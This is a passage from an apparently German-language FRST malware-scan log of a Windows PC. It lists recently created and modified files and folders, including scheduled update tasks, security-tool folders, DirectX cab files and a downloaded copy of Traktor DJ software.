20:20 - 2015-08-07 22:21 - 00000000 ____D C:\Users\Kenny G\Desktop\Native.Instruments.TRAKTOR.2.v2.9.0.x86.x64-CHAOS 2015-08-31 23:34 - 2015-09-01 20:19 - 527315694 _____ C:\Users\Kenny G\Downloads\2.9.0.x86.x64-CHAOS.rar 2015-08-29 20:49 - 2015-08-29 20:49 - 00000000 _____ C:\Windows\setuperr.log 2015-08-29 20:33 - 2015-08-29 20:34 - 00000000 ____D C:\ProgramData\Package Cache 2015-08-29 19:48 - 2015-09-19 11:54 - 00000000 ____D C:\Users\Kenny G\Desktop\Alles 2015-08-29 16:06 - 2015-08-30 01:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2015-08-29 15:56 - 2015-09-01 22:33 - 00143270 _____ C:\Windows\DPINST.LOG ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2015-09-20 19:30 - 2013-10-01 21:23 - 01080796 _____ C:\Windows\WindowsUpdate.log 2015-09-20 19:24 - 2015-05-19 19:27 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job 2015-09-20 19:16 - 2015-06-01 12:52 - 00000000 ____D C:\ProgramData\MFAData 2015-09-20 19:14 - 2013-10-01 21:24 - 00000000 ____D C:\Users\Kenny G 2015-09-20 18:28 - 2009-07-14 06:45 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2015-09-20 18:28 - 2009-07-14 06:45 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2015-09-20 18:24 - 2015-05-19 19:27 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job 2015-09-20 18:23 - 2015-08-07 13:40 - 00025668 _____ C:\Windows\PFRO.log 2015-09-20 18:23 - 2015-07-28 07:45 - 00018460 _____ C:\Windows\setupact.log 2015-09-20 18:23 - 2013-11-03 19:09 - 00000000 ____D C:\ProgramData\NVIDIA 2015-09-20 18:23 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2015-09-20 18:21 - 2015-06-01 11:16 - 00000000 ____D C:\AdwCleaner 2015-09-20 18:07 - 2015-08-07 11:34 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Lavasoft 2015-09-20 18:07 - 2015-08-07 11:33 - 00000000 ____D C:\ProgramData\Lavasoft 2015-09-20 18:07 - 2015-08-07 11:33 - 00000000 ____D C:\Program Files (x86)\Lavasoft 2015-09-20 03:16 - 2013-10-02 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\vlc 2015-09-19 18:33 - 2013-10-03 21:25 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Skype 2015-09-19 17:16 - 2015-07-27 22:57 - 00068936 _____ C:\Users\Kenny G\AppData\Local\GDIPFONTCACHEV1.DAT 2015-09-19 16:39 - 2015-07-28 07:44 - 00317968 _____ C:\Windows\system32\FNTCACHE.DAT 2015-09-19 16:38 - 2015-05-12 22:45 - 00000000 ____D C:\Program Files\Microsoft Silverlight 2015-09-19 16:38 - 2015-05-12 22:45 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight 2015-09-19 16:35 - 2015-05-12 22:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2015-09-19 16:07 - 2015-08-07 11:38 - 00003848 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1438940281 2015-09-19 16:07 - 2015-08-07 11:37 - 00000000 ____D C:\Program Files (x86)\Opera 2015-09-19 16:06 - 2009-07-14 05:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared 2015-09-19 15:37 - 2015-06-02 08:55 - 00000000 ____D C:\ProgramData\AVG2015 2015-09-19 15:37 - 2013-10-01 21:25 - 00001442 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk 2015-09-19 11:54 - 2014-11-11 21:45 - 00000000 ____D C:\Users\Kenny G\Desktop\schule 2015-09-19 11:17 - 2009-07-14 20:18 - 00000000 ____D C:\Windows\ShellNew 2015-09-16 20:19 - 2015-05-19 19:27 - 00004106 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70 2015-09-16 20:19 - 2015-05-19 19:27 - 00003854 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720 2015-09-12 12:16 - 2014-01-15 20:58 - 00282296 _____ C:\Windows\SysWOW64\PnkBstrB.xtr 2015-09-12 12:16 - 2014-01-15 20:58 - 00282296 _____ C:\Windows\SysWOW64\PnkBstrB.exe 2015-09-12 12:14 - 2014-01-15 20:58 - 00215128 _____ C:\Windows\SysWOW64\PnkBstrB.ex0 2015-09-12 12:14 - 2013-12-08 04:01 - 00000000 ____D C:\Program Files (x86)\Steam 2015-09-09 10:54 - 2014-02-17 11:46 - 00000000 ____D C:\Users\Tabea Studium 2015-09-09 10:54 - 2013-12-14 00:05 - 00000000 ____D C:\Users\eLoot 2015-09-03 13:45 - 2013-10-26 19:41 - 00305664 ___SH C:\Users\Kenny G\Documents\Thumbs.db 2015-09-03 13:43 - 2015-08-13 02:23 - 00000946 _____ C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job 2015-09-03 13:43 - 2015-02-10 17:45 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job 2015-09-03 13:43 - 2015-02-10 17:45 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job 2015-09-03 13:43 - 2014-11-14 16:21 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job 2015-09-03 13:43 - 2014-02-16 13:52 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2015-09-03 13:43 - 2014-02-16 13:52 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2015-09-02 22:17 - 2015-06-01 12:10 - 00003206 _____ C:\Windows\System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441} 2015-09-02 22:17 - 2015-02-10 17:45 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80 2015-09-02 22:16 - 2015-08-13 02:23 - 00003948 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier 2015-09-02 22:16 - 2015-02-10 17:45 - 00003866 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0 2015-09-02 22:16 - 2014-11-14 16:21 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90 2015-09-02 22:16 - 2014-02-16 13:52 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2015-09-02 22:16 - 2014-02-16 13:52 - 00003866 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2015-09-02 22:16 - 2014-02-16 03:10 - 00003300 _____ C:\Windows\System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679} 2015-09-02 22:16 - 2013-10-01 22:01 - 00002778 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC 2015-09-01 22:34 - 2015-08-14 11:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments 2015-09-01 22:33 - 2015-08-14 11:07 - 00000000 ____D C:\Program Files\Native Instruments 2015-09-01 22:24 - 2015-08-14 11:07 - 00000000 ____D C:\Program Files\Common Files\Native Instruments 2015-09-01 22:17 - 2015-08-08 00:13 - 00000000 ____D C:\Users\Kenny G\Documents\Native Instruments 2015-08-30 01:38 - 2013-12-04 21:27 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2015-08-29 20:01 - 2014-06-19 18:04 - 00000000 ____D C:\Users\Kenny G\.thumbnails 2015-08-29 20:01 - 2009-10-14 08:04 - 00000000 ____D C:\Windows\Panther 2015-08-29 19:56 - 2015-07-20 21:25 - 00000995 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Start Tor Browser.lnk 2015-08-29 15:58 - 2015-08-14 11:07 - 00000000 ____D C:\ProgramData\Native Instruments 2015-08-29 09:26 - 2015-06-02 08:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG 2015-08-29 03:35 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF 2015-08-26 18:37 - 2009-10-14 07:12 - 134753440 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe 2015-08-26 11:33 - 2015-06-02 09:01 - 00000000 ____D C:\Program Files (x86)\AVG Web TuneUp ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2010-06-02 06:21 - 2010-06-02 06:21 - 1347354 _____ () C:\Program Files (x86)\Apr2005_d3dx9_25_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1078962 _____ () C:\Program Files (x86)\Apr2005_d3dx9_25_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1397830 _____ () C:\Program Files (x86)\Apr2006_d3dx9_30_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1115221 _____ () C:\Program Files (x86)\Apr2006_d3dx9_30_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0916430 _____ () C:\Program Files (x86)\Apr2006_MDX1_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 4162630 _____ () C:\Program Files (x86)\Apr2006_MDX1_x86_Archive.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0179133 _____ () C:\Program Files (x86)\Apr2006_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0133103 _____ () C:\Program Files (x86)\Apr2006_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0087101 _____ () C:\Program Files (x86)\Apr2006_xinput_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0046010 _____ () C:\Program Files (x86)\Apr2006_xinput_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0698612 _____ () C:\Program Files (x86)\APR2007_d3dx10_33_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0695865 _____ () C:\Program Files (x86)\APR2007_d3dx10_33_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1607358 _____ () C:\Program Files (x86)\APR2007_d3dx9_33_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1606039 _____ () C:\Program Files (x86)\APR2007_d3dx9_33_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0195766 _____ () C:\Program Files (x86)\APR2007_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0151225 _____ () C:\Program Files (x86)\APR2007_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0096817 _____ () C:\Program Files (x86)\APR2007_xinput_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0053302 _____ () C:\Program Files (x86)\APR2007_xinput_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1350542 _____ () C:\Program Files (x86)\Aug2005_d3dx9_27_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1077644 _____ () C:\Program Files (x86)\Aug2005_d3dx9_27_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0182903 _____ () C:\Program Files (x86)\AUG2006_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0137235 _____ () C:\Program Files (x86)\AUG2006_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0087142 _____ () C:\Program Files (x86)\AUG2006_xinput_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0046058 _____ () C:\Program Files (x86)\AUG2006_xinput_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0852286 _____ () C:\Program Files (x86)\AUG2007_d3dx10_35_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0796867 _____ () C:\Program Files (x86)\AUG2007_d3dx10_35_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1800160 _____ () C:\Program Files (x86)\AUG2007_d3dx9_35_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1708152 _____ () C:\Program Files (x86)\AUG2007_d3dx9_35_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0198096 _____ () C:\Program Files (x86)\AUG2007_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0153012 _____ () C:\Program Files (x86)\AUG2007_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0867612 _____ () C:\Program Files (x86)\Aug2008_d3dx10_39_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0849167 _____ () C:\Program Files (x86)\Aug2008_d3dx10_39_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1794084 _____ () C:\Program Files (x86)\Aug2008_d3dx9_39_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1464672 _____ () C:\Program Files (x86)\Aug2008_d3dx9_39_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0121772 _____ () C:\Program Files (x86)\Aug2008_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0092996 _____ () C:\Program Files (x86)\Aug2008_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0271412 _____ () C:\Program Files (x86)\Aug2008_XAudio_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0271038 _____ () C:\Program Files (x86)\Aug2008_XAudio_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0919044 _____ () C:\Program Files (x86)\Aug2009_D3DCompiler_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0900598 _____ () C:\Program Files (x86)\Aug2009_D3DCompiler_42_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 3112111 _____ () C:\Program Files (x86)\Aug2009_d3dcsx_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 3319740 _____ () C:\Program Files (x86)\Aug2009_d3dcsx_42_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0232635 _____ () C:\Program Files (x86)\Aug2009_d3dx10_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0192131 _____ () C:\Program Files (x86)\Aug2009_d3dx10_42_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0136301 _____ () C:\Program Files (x86)\Aug2009_d3dx11_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0105044 _____ () C:\Program Files (x86)\Aug2009_d3dx11_42_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0930116 _____ () C:\Program Files (x86)\Aug2009_d3dx9_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0728456 _____ () C:\Program Files (x86)\Aug2009_d3dx9_42_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0122408 _____ () C:\Program Files (x86)\Aug2009_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093106 _____ () C:\Program Files (x86)\Aug2009_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0273264 _____ () C:\Program Files (x86)\Aug2009_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0272642 _____ () C:\Program Files (x86)\Aug2009_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1357976 _____ () C:\Program Files (x86)\Dec2005_d3dx9_28_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1079456 _____ () C:\Program Files (x86)\Dec2005_d3dx9_28_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0212807 _____ () C:\Program Files (x86)\DEC2006_d3dx10_00_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0191720 _____ () C:\Program Files (x86)\DEC2006_d3dx10_00_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1571154 _____ () C:\Program Files (x86)\DEC2006_d3dx9_32_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1574376 _____ () C:\Program Files (x86)\DEC2006_d3dx9_32_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0192475 _____ () C:\Program Files (x86)\DEC2006_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0145599 _____ () C:\Program Files (x86)\DEC2006_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0089944 _____ (Microsoft Corporation) C:\Program Files (x86)\DSETUP.dll 2010-06-02 06:22 - 2010-06-02 06:22 - 1801048 _____ () C:\Program Files (x86)\dsetup32.dll 2010-06-02 06:22 - 2010-06-02 06:22 - 0042410 _____ () C:\Program Files (x86)\dxdllreg_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0537432 _____ () C:\Program Files (x86)\DXSETUP.exe 2010-06-02 06:22 - 2010-06-02 06:22 - 0094011 _____ () C:\Program Files (x86)\dxupdate.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1247499 _____ () C:\Program Files (x86)\Feb2005_d3dx9_24_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1013225 _____ () C:\Program Files (x86)\Feb2005_d3dx9_24_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1362796 _____ () C:\Program Files (x86)\Feb2006_d3dx9_29_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1084720 _____ () C:\Program Files (x86)\Feb2006_d3dx9_29_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0178359 _____ () C:\Program Files (x86)\Feb2006_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0132409 _____ () C:\Program Files (x86)\Feb2006_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0194675 _____ () C:\Program Files (x86)\FEB2007_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0147983 _____ () C:\Program Files (x86)\FEB2007_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0054678 _____ () C:\Program Files (x86)\Feb2010_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0020713 _____ () C:\Program Files (x86)\Feb2010_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0122446 _____ () C:\Program Files (x86)\Feb2010_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093180 _____ () C:\Program Files (x86)\Feb2010_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0276960 _____ () C:\Program Files (x86)\Feb2010_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0277191 _____ () C:\Program Files (x86)\Feb2010_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1336002 _____ () C:\Program Files (x86)\Jun2005_d3dx9_26_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1064925 _____ () C:\Program Files (x86)\Jun2005_d3dx9_26_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0180785 _____ () C:\Program Files (x86)\JUN2006_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0133671 _____ () C:\Program Files (x86)\JUN2006_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0699044 _____ () C:\Program Files (x86)\JUN2007_d3dx10_34_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0698472 _____ () C:\Program Files (x86)\JUN2007_d3dx10_34_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1607774 _____ () C:\Program Files (x86)\JUN2007_d3dx9_34_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1607286 _____ () C:\Program Files (x86)\JUN2007_d3dx9_34_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0197122 _____ () C:\Program Files (x86)\JUN2007_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0152909 _____ () C:\Program Files (x86)\JUN2007_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0867828 _____ () C:\Program Files (x86)\JUN2008_d3dx10_38_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0849919 _____ () C:\Program Files (x86)\JUN2008_d3dx10_38_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1792608 _____ () C:\Program Files (x86)\JUN2008_d3dx9_38_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1463878 _____ () C:\Program Files (x86)\JUN2008_d3dx9_38_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0055154 _____ () C:\Program Files (x86)\JUN2008_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021905 _____ () C:\Program Files (x86)\JUN2008_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0121054 _____ () C:\Program Files (x86)\JUN2008_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093128 _____ () C:\Program Files (x86)\JUN2008_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0269628 _____ () C:\Program Files (x86)\JUN2008_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0269024 _____ () C:\Program Files (x86)\JUN2008_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0944460 _____ () C:\Program Files (x86)\Jun2010_D3DCompiler_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0931471 _____ () C:\Program Files (x86)\Jun2010_D3DCompiler_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0752783 _____ () C:\Program Files (x86)\Jun2010_d3dcsx_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0762188 _____ () C:\Program Files (x86)\Jun2010_d3dcsx_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0235955 _____ () C:\Program Files (x86)\Jun2010_d3dx10_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0197283 _____ () C:\Program Files (x86)\Jun2010_d3dx10_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0138205 _____ () C:\Program Files (x86)\Jun2010_d3dx11_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0109445 _____ () C:\Program Files (x86)\Jun2010_d3dx11_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0937246 _____ () C:\Program Files (x86)\Jun2010_d3dx9_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0768036 _____ () C:\Program Files (x86)\Jun2010_d3dx9_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0124596 _____ () C:\Program Files (x86)\Jun2010_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093686 _____ () C:\Program Files (x86)\Jun2010_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0277338 _____ () C:\Program Files (x86)\Jun2010_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0278060 _____ () C:\Program Files (x86)\Jun2010_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0844884 _____ () C:\Program Files (x86)\Mar2008_d3dx10_37_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0818260 _____ () C:\Program Files (x86)\Mar2008_d3dx10_37_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1769862 _____ () C:\Program Files (x86)\Mar2008_d3dx9_37_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1443282 _____ () C:\Program Files (x86)\Mar2008_d3dx9_37_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0055058 _____ () C:\Program Files (x86)\Mar2008_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021867 _____ () C:\Program Files (x86)\Mar2008_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0122336 _____ () C:\Program Files (x86)\Mar2008_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093734 _____ () C:\Program Files (x86)\Mar2008_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0251194 _____ () C:\Program Files (x86)\Mar2008_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0226250 _____ () C:\Program Files (x86)\Mar2008_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1067160 _____ () C:\Program Files (x86)\Mar2009_d3dx10_41_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1040745 _____ () C:\Program Files (x86)\Mar2009_d3dx10_41_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1973702 _____ () C:\Program Files (x86)\Mar2009_d3dx9_41_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1612446 _____ () C:\Program Files (x86)\Mar2009_d3dx9_41_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0054600 _____ () C:\Program Files (x86)\Mar2009_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021298 _____ () C:\Program Files (x86)\Mar2009_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0121506 _____ () C:\Program Files (x86)\Mar2009_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0092740 _____ () C:\Program Files (x86)\Mar2009_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0275044 _____ () C:\Program Files (x86)\Mar2009_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0273018 _____ () C:\Program Files (x86)\Mar2009_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0864600 _____ () C:\Program Files (x86)\Nov2007_d3dx10_36_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0803884 _____ () C:\Program Files (x86)\Nov2007_d3dx10_36_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1802058 _____ () C:\Program Files (x86)\Nov2007_d3dx9_36_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1709360 _____ () C:\Program Files (x86)\Nov2007_d3dx9_36_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0046144 _____ () C:\Program Files (x86)\NOV2007_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0018496 _____ () C:\Program Files (x86)\NOV2007_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0196762 _____ () C:\Program Files (x86)\NOV2007_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0148264 _____ () C:\Program Files (x86)\NOV2007_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0994154 _____ () C:\Program Files (x86)\Nov2008_d3dx10_40_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0965421 _____ () C:\Program Files (x86)\Nov2008_d3dx10_40_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1906878 _____ () C:\Program Files (x86)\Nov2008_d3dx9_40_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1550796 _____ () C:\Program Files (x86)\Nov2008_d3dx9_40_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0054522 _____ () C:\Program Files (x86)\Nov2008_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021851 _____ () C:\Program Files (x86)\Nov2008_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0121794 _____ () C:\Program Files (x86)\Nov2008_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0092684 _____ () C:\Program Files (x86)\Nov2008_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0273960 _____ () C:\Program Files (x86)\Nov2008_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0272611 _____ () C:\Program Files (x86)\Nov2008_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0086037 _____ () C:\Program Files (x86)\Oct2005_xinput_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0045359 _____ () C:\Program Files (x86)\Oct2005_xinput_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1412902 _____ () C:\Program Files (x86)\OCT2006_d3dx9_31_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1127217 _____ () C:\Program Files (x86)\OCT2006_d3dx9_31_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0182361 _____ () C:\Program Files (x86)\OCT2006_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0138017 _____ () C:\Program Files (x86)\OCT2006_XACT_x86.cab 2015-07-05 04:14 - 2015-07-05 04:14 - 0000911 _____ () C:\Users\Kenny G\AppData\Local\recently-used.xbel 2014-07-31 10:50 - 2014-07-31 10:51 - 0022400 _____ () C:\ProgramData\RUNDLL32.EXE-1180-F.txt 2014-07-06 17:23 - 2014-07-06 17:23 - 0244720 _____ () C:\ProgramData\RUNDLL32.EXE-12956-F.txt 2014-07-27 17:22 - 2014-07-28 13:07 - 0079618 _____ () C:\ProgramData\RUNDLL32.EXE-1384-F.txt 2014-07-10 10:53 - 2014-07-10 17:12 - 0298281 _____ () C:\ProgramData\RUNDLL32.EXE-1424-F.txt 2014-07-19 22:13 - 2014-07-20 00:37 - 0113345 _____ () C:\ProgramData\RUNDLL32.EXE-1436-F.txt 2014-07-30 09:52 